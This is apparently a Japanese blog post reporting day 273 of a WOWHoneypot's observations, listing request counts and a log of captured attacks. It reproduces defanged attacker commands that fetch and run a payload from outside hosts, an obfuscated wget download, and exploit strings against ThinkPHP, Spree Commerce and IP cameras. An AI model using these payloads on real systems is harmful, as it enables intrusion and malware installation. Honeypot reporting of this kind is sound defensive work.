WOWHoneypot観察(273日目)
2019/12/14(土)
トータルは4072件でした。
ハンティングログは以下です。
| 208.97.139[.]112 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
| 208.97.139[.]112 curl -O hxxp[:]//145.249.106[.]241/richard |
www.virustotal.com
www.virustotal.com
| 208.97.139[.]112 wget hxxp[:]//80.82.64[.]14/richard |
| 185.255.210[.]58 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
| 件数 | 概要 | リクエスト |
|---|---|---|
| 4003 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 38 | アクセス | GET / |
| 3 | SpringDataCommonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 2 | WordPressに対するログイン試行 | POST /wp-login.php |
| 2 | WordPressに対するログイン試行 | GET /wp-login.php |
| 2 | IPカメラの脆弱性を狙った通信 | GET /system.ini?loginuse&loginpas |
| 1 | 不正中継の調査 | GET hxxp[:]//ipinfo.io/json |
| 1 | 不明 | GET /login/submit/onlyy |
| 1 | WCF URLの調査 | GET /Temporary_Listen_Addresses/SMSSERVICE |
| 1 | Spreecommerceの脆弱性を狙った通信 | GET /?search[send]=eval&search[send]=Kernel.fork%20do%60wget%20hxxp%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20hxxp%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60end |
| 1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET /muieblackcat |
| 1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
| 1 | 管理者情報の調査 | GET //admin/config.php?password%5B0%5D=ZIZO&username=admin |
にほんブログ村